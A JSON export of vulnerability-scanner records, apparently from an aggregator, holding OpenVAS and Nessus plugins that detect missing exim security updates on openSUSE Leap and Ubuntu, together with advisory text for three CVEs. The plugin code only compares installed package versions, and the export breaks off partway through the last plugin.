{"id": "OPENVAS:1361412562310851601", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)", "description": "The remote host is missing an update for the ", "published": "2017-08-30T00:00:00", "modified": "2020-01-31T00:00:00", "epss": [{"cve": "CVE-2016-1531", "epss": 0.00057, "percentile": 0.22118, "modified": "2023-11-24"}, {"cve": "CVE-2016-9963", "epss": 0.00397, "percentile": 0.70618, "modified": "2023-11-24"}, {"cve": "CVE-2017-1000369", "epss": 0.00288, "percentile": 0.6548, "modified": "2023-11-24"}], "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851601", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017:2289-1"], "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "immutableFields": [], "lastseen": "2020-01-31T18:28:04", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2017-1000369"]}, {"type": "amazon", "idList": ["ALAS-2017-804"]}, {"type": "archlinux", "idList": ["ASA-201603-8", "ASA-201711-32"]}, {"type": "cve", "idList": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1001-1:275F5", "DEBIAN:DLA-762-1:0D8D2", "DEBIAN:DSA-3517-1:82080", "DEBIAN:DSA-3517-1:EFA69", "DEBIAN:DSA-3747-1:65DFE", "DEBIAN:DSA-3747-1:7D21A", "DEBIAN:DSA-3888-1:AEA40"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-1531", "DEBIANCVE:CVE-2016-9963", "DEBIANCVE:CVE-2017-1000369"]}, {"type": "exploitdb", "idList": ["EDB-ID:39535", "EDB-ID:39549", "EDB-ID:39702"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4D7480E2B540BD30AB455D1DDEFB98B3", "EXPLOITPACK:D13F3E1C0485FC1698443786E9BA6A42"]}, {"type": "fedora", "idList": ["FEDORA:27F05611D25E", "FEDORA:D9A2F6002DDF", "FEDORA:E514560A8F98"]}, {"type": "freebsd", "idList": 
["7D09B9EE-E0BA-11E5-ABC4-6FB07AF136D2", "8C1A271D-56CF-11E7-B9FE-C13EB7BCBF4F", "E7002B26-CAAA-11E6-A76A-9F7324E5534E"]}, {"type": "gentoo", "idList": ["GLSA-201709-19"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-UNIX-LOCAL-EXIM_PERL_STARTUP-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-804.NASL", "DEBIAN_DLA-1001.NASL", "DEBIAN_DLA-762.NASL", "DEBIAN_DSA-3517.NASL", "DEBIAN_DSA-3747.NASL", "DEBIAN_DSA-3888.NASL", "FEDORA_2016-0E3CA94D88.NASL", "FEDORA_2016-E062971917.NASL", "FEDORA_2017-F5177F3A16.NASL", "FREEBSD_PKG_7D09B9EEE0BA11E5ABC46FB07AF136D2.NASL", "FREEBSD_PKG_8C1A271D56CF11E7B9FEC13EB7BCBF4F.NASL", "FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "GENTOO_GLSA-201709-19.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "OPENSUSE-2016-326.NASL", "OPENSUSE-2017-714.NASL", "OPENSUSE-2017-980.NASL", "OPENSUSE-2021-677.NASL", "UBUNTU_USN-2933-1.NASL", "UBUNTU_USN-3164-1.NASL", "UBUNTU_USN-3322-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105568", "OPENVAS:1361412562310106485", "OPENVAS:1361412562310703517", "OPENVAS:1361412562310703747", "OPENVAS:1361412562310703888", "OPENVAS:1361412562310807496", "OPENVAS:1361412562310842695", "OPENVAS:1361412562310843007", "OPENVAS:1361412562310843214", "OPENVAS:1361412562310851232", "OPENVAS:1361412562310851569", "OPENVAS:1361412562310873330", "OPENVAS:1361412562310891001", "OPENVAS:703517", "OPENVAS:703747", "OPENVAS:703888"]}, {"type": "osv", "idList": ["OSV:DLA-1001-1", "OSV:DSA-3517-1", "OSV:DSA-3888-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136124", "PACKETSTORM:136165", "PACKETSTORM:136694"]}, {"type": "prion", "idList": ["PRION:CVE-2016-1531", "PRION:CVE-2016-9963", "PRION:CVE-2017-1000369"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9963", "RH:CVE-2017-1000369"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0721-1", "OPENSUSE-SU-2017:1625-1", "OPENSUSE-SU-2017:2289-1", "OPENSUSE-SU-2021:0677-1", 
"OPENSUSE-SU-2021:0753-1", "OPENSUSE-SU-2021:0754-1"]}, {"type": "ubuntu", "idList": ["USN-2933-1", "USN-3164-1", "USN-3322-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-1531", "UB:CVE-2016-9963", "UB:CVE-2017-1000369"]}, {"type": "zdt", "idList": ["1337DAY-ID-25543", "1337DAY-ID-25544", "1337DAY-ID-25565"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-804"]}, {"type": "archlinux", "idList": ["ASA-201603-8"]}, {"type": "cve", "idList": ["CVE-2016-9963", "CVE-2017-1000369"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1001-1:275F5", "DEBIAN:DLA-762-1:0D8D2", "DEBIAN:DSA-3747-1:65DFE", "DEBIAN:DSA-3888-1:AEA40"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-1531", "DEBIANCVE:CVE-2016-9963", "DEBIANCVE:CVE-2017-1000369"]}, {"type": "exploitdb", "idList": ["EDB-ID:39535", "EDB-ID:39549"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D13F3E1C0485FC1698443786E9BA6A42"]}, {"type": "fedora", "idList": ["FEDORA:E514560A8F98"]}, {"type": "freebsd", "idList": ["7D09B9EE-E0BA-11E5-ABC4-6FB07AF136D2", "8C1A271D-56CF-11E7-B9FE-C13EB7BCBF4F"]}, {"type": "gentoo", "idList": ["GLSA-201709-19"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/LOCAL/EXIM_PERL_STARTUP"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1001.NASL", "DEBIAN_DSA-3517.NASL", "DEBIAN_DSA-3888.NASL", "FEDORA_2016-0E3CA94D88.NASL", "FEDORA_2016-E062971917.NASL", "FEDORA_2017-F5177F3A16.NASL", "FREEBSD_PKG_7D09B9EEE0BA11E5ABC46FB07AF136D2.NASL", "FREEBSD_PKG_8C1A271D56CF11E7B9FEC13EB7BCBF4F.NASL", "GENTOO_GLSA-201709-19.NASL", "OPENSUSE-2016-326.NASL", "OPENSUSE-2017-714.NASL", "UBUNTU_USN-3322-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106485", "OPENVAS:1361412562310873330", "OPENVAS:703747"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136694"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9963", "RH:CVE-2017-1000369"]}, {"type": 
"suse", "idList": ["OPENSUSE-SU-2017:1625-1"]}, {"type": "ubuntu", "idList": ["USN-3164-1", "USN-3322-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9963", "UB:CVE-2017-1000369"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-1531", "epss": "0.000570000", "percentile": "0.215590000", "modified": "2023-03-15"}, {"cve": "CVE-2016-9963", "epss": "0.003970000", "percentile": "0.693690000", "modified": "2023-03-15"}, {"cve": "CVE-2017-1000369", "epss": "0.004430000", "percentile": "0.709220000", "modified": "2023-03-15"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1700858913, "score": 1700859993, "epss": 0}, "_internal": {"score_hash": "23ed15c938715ff5e6752cf0ff289cee"}, "pluginID": "1361412562310851601", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851601\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-30 07:23:21 +0200 (Wed, 30 Aug 2017)\");\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n Changes in exim:\n\n - specify users with ref:mail, to make them dynamic. 
(boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to 'stack\n crash' local privilege escalation (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2289-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", 
rpm:\"exim-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "SuSE Local Security Checks"}
{"nessus": [{"lastseen": "2023-12-08T14:58:56", "description": "This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to 'stack crash' local privilege escalation (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local users to gain privileges via the perl_startup argument. \n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL", "cvss3": {}, "published": "2017-08-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-980.NASL", "href": "https://www.tenable.com/plugins/nessus/102834", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in 
this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-980.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102834);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-980 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be\n exploited to 'stack crash' local privilege escalation\n (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users\n handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL\n < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local\n users to gain privileges via the perl_startup argument. 
\n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1046971\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.6.1\") 
) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debugsource-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximstats-html-4.86.2-14.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:48:37", "description": "Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain configurations, private DKIM signing keys could be leaked to the log files.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-01-06T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3164-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config"], "id": "UBUNTU_USN-3164-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3164-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96336);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"USN\", value:\"3164-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3164-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. 
In\ncertain configurations, private DKIM signing keys could be leaked to\nthe log files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3164-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04', 'Ubuntu ' + os_release);\nif ( ! 
